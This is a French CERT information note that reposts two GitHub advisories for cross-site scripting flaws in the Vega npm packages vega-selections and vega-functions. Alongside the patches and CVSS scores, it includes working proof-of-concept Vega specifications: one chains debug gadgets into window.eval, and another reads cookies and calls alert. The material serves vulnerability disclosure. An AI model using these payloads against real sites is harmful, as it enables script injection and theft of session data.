Ce mail provient de l'extérieur, restons vigilants

=====================================================================

                            CERT-Renater

                Note d'Information No. 2026/VULN010
_____________________________________________________________________

DATE                : 08/01/2026

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running vega-selections (npm) versions
                           prior to 6.1.2, 5.6.3,
                  vega-functions (npm) versions prior to 6.1.1.

=====================================================================
https://github.com/vega/vega/security/advisories/GHSA-829q-m3qg-ph8r
https://github.com/vega/vega/security/advisories/GHSA-m9rg-mr6g-75gm
_____________________________________________________________________

Vega Cross-Site Scripting (XSS) via expression abusing
vlSelectionTuples function array map calls in environments with
satisfactory function gadgets in the global scope

High
hydrosquall published GHSA-829q-m3qg-ph8r Jan 5, 2026

Package
vega-selections (npm)

Affected versions
<= 6.1.0, <= 5.6.1

Patched versions
6.1.2, 5.6.3


Description

Impact

Applications meeting these two conditions are at risk of arbitrary
JavaScript code execution, even if "safe mode"
expressionInterpreter is used.

    Use vega in an application that attaches both vega library and
a vega.View instance similar to the Vega Editor to the global
window, or has any other satisfactory function gadgets in the global
scope
    Allow user-defined Vega JSON definitions (vs JSON that was is
only provided through source code)

Patches

    With Vega v6, use vega-selections@6.1.2 (requires ESM)
    With Vega v5, use vega-selections@5.6.3 (No ESM needed)


Workarounds

    Do not attach vega or vega.View instances to global variables or
the window as the editor used to do here . This is a development-only
debugging practice that should not be used in any situation where
Vega/Vega-lite definitions can come from untrusted parties.


POC Summary

Vega offers the evaluation of expressions in a secure context.
Arbitrary function call is prohibited. When an event is exposed to
an expression, member get of window objects is possible. Because of
this exposure, in some applications, a crafted object that sets a map
value with a function copied from the window that results in calling
this.foo(this.bar) can be passed to the vlSelectionTuples function,
calling the copied map function, allowing DOM XSS to be achieved.

In practice, an accessible gadget like this exists in the global
VEGA_DEBUG code.

vlSelectionTuples({
    map: event.view.VEGA_DEBUG.vega.CanvasHandler.prototype.on,
    eventName: event.view.console.log,
    _handlers:{
        undefined: 'alert(origin + ` XSS on version `+ VEGA_DEBUG.VEGA_VERSION)'
    },
    _handlerIndex: event.view.eval
})

POC Details

{
  "$schema": "https://vega.github.io/schema/vega/v5.json",
  "width": 350,
  "height": 350,
  "autosize": "none",
  "description": "Toggle Button",
  "signals": [
    {
      "name": "toggle",
      "value": true,
      "on": [
        {
          "events": {"type": "click", "markname": "circle"},
          "update": "toggle ? false : true"
        }
      ]
    },
    {
      "name": "addFilter",
      "on": [
        {
          "events": {"type": "mousemove", "source": "window"},
          "update": "vlSelectionTuples({map:event.view.VEGA_DEBUG.vega.CanvasHandler.prototype.on, eventName:event.view.console.log,_handlers:{undefined:'alert(origin + ` XSS on version `+ VEGA_DEBUG.VEGA_VERSION)'},_handlerIndex:event.view.eval})"
        }
      ]
    }
  ]
}

This payload creates a scenario where whenever the mouse is moved,
the map function of the provided object is called by the code that
implements the vlSelectionTuples function. The map function has
been set to a "gadget function"
(VEGA_DEBUG.vega.CanvasHandler.prototype.on) that does the
following:

   on(a, o) {
        const u = this.eventName(a)
          , d = this._handlers;
        if (this._handlerIndex(d[u], a, o) < 0) {
        ....
        }
        ....
   }

    Set u to the result of calling this.eventName with undefined
        For our object, we have the eventName value set to
console.log, which just logs undefined and returns undefined
    Sets d to this._handlers
        For our object, we have this defined to be used later
    Calls this._handlerIndex with the result of u indexed into the
d object as the first argument, and undefined as the second two.
        For our object, _handlerIndex is set to window.eval, and when
indexing undefined into the _handlers, a string to be evald
containing the XSS payload is returned.

This results in XSS by using a globally scoped gadget to get full
blown eval.


PoC Link

Navigate here, move the mouse, and observe that the arbitrary
JavaScript from the configuration reaches the eval sink and
DOM XSS is achieved.

For a PoC that works even with the AST evaluator, abusing
function call gadgets to get access to window.eval with more
advanced gadgets, navigate here
Future investigation

In cases where VEGA_DEBUG is not enabled, there could
theoretically be other gadgets on the global scope that
allow for similar behavior. In cases where AST evaluator is
used and there are blocks against getting references to
eval, in theory there could be other gadgets on global scope
(i.e. jQuery) that would allow for eval the same way
(i.e. $.globalEval). As of this writing, no such globally
scoped universal gadgets have been found.


Recommended Fix

In the selectionTuples implementation that backs the
vulnerable function call, the code should be changed to
check Array.isArray(array) before calling a potentiallyd
angerous user provided .map on the array argument.
Impact

This vulnerability allows for DOM XSS, potentially stored,
potentially reflected, depending on how the library is
being used. The vulnerability requires user interaction
with the page to trigger.

An attacker can exploit this issue by tricking a user into
opening a malicious Vega specification. Successful
exploitation allows the attacker to execute arbitrary
JavaScript in the context of the application’s domain. This
can lead to theft of sensitive information such as
authentication tokens, manipulation of data displayed to the
user, or execution of unauthorized actions on behalf of the
victim. This exploit compromises confidentiality and integrity
of impacted applications.


Severity
High
8.1/ 10

CVSS v3 base metrics
Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
None
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

CVE ID
CVE-2025-65110

Weaknesses
Weakness CWE-79


Credits

    @nickcopi nickcopi Reporter
    @hydrosquall hydrosquall Remediation developer
    @domoritz domoritz Remediation reviewer

_____________________________________________________________________


XSS in `vega-functions` via `setdata` function
High
hydrosquall published GHSA-m9rg-mr6g-75gm Jan 5, 2026

Package
vega-functions (npm)

Affected versions
6.1.0

Patched versions
6.1.1


Description
Impact

For sites that allow users to supply untrusted user input, malicious
use of an internal function (not part of the public API) could be used
to run unintentional javascript (XSS).


Patches

Fixed in vega-functions 6.1.1


Workarounds

There is no workaround besides upgrading. Using
vega.expressionInterpreter as described in CSP safe mode does not
prevent this issue.


Exploit Proof of Concept

Vega's expression modify() function, used by setdata, allows attacker
to control both the method called and the values supplied, which
results to XSS . This was a previous POC:

{
  "$schema": "https://vega.github.io/schema/vega/v6.json",
  "data": [
    {
      "name": "table",
      "values": [
        {"category": "A", "amount": 28}
      ]
    }
  ],
  "signals": [
    {
      "name": "tooltip",
      "value": {},
      "on": [
        {"events": {"type":"timer","throttle":2000}, "update": "setdata('table',[['Domain: '+event.dataflow._el.ownerDocument.domain+' , cookies: '+ event.dataflow._el.ownerDocument.cookie ]])+warn('XSS is here', modify('table',2,3,null,event.dataflow._el.ownerDocument.defaultView.alert,{'tttt':'yyyy'}) )"},
        {"events": "rect:pointerout",  "update": "{}"}
      ]
    }
  ]
}

Severity
High
7.2/ 10

CVSS v3 base metrics
Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

CVE ID
CVE-2025-66648

Weaknesses
No CWEs

Credits

    @nikolaybabiy nikolaybabiy Reporter
    @hydrosquall hydrosquall Remediation developer
    @domoritz domoritz Remediation reviewer


=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================